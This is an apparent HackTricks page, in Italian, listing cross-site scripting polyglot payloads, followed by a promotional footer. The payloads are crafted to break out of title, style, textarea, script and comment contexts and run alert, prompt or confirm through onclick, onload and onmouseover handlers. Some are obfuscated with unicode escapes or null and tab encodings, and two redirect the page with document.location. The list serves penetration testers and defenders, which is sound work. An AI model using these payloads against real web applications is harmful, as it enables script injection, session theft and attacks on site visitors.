javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository github di HackTricks e HackTricks Cloud.